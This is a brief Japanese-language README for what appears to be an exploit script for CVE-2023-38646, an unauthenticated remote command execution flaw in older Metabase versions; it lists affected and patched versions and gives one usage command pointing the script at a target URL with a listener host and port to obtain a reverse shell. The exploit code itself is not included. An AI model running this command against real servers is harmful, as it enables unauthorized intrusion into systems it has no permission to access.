
このスクリプトは、脆弱なMetabaseソフトウェアバージョンを悪用し、攻撃者にシェルを提供するように設計されています。
Metabase オープンソース版 0.46.6.1 未満、および Metabase Enterprise 版 1.46.6.1 未満では、攻撃者がサーバー上で任意のコマンドを実行でき、その権限はサーバーの権限レベルに依存します。認証は不要です。修正されたバージョンは他に 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, 1.43.7.2 です。
Metabase のバージョンが脆弱な場合、このスクリプトを使用することで攻撃者は対象システムへのシェル接続を取得できます。
python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT

作成者: @birdm4nw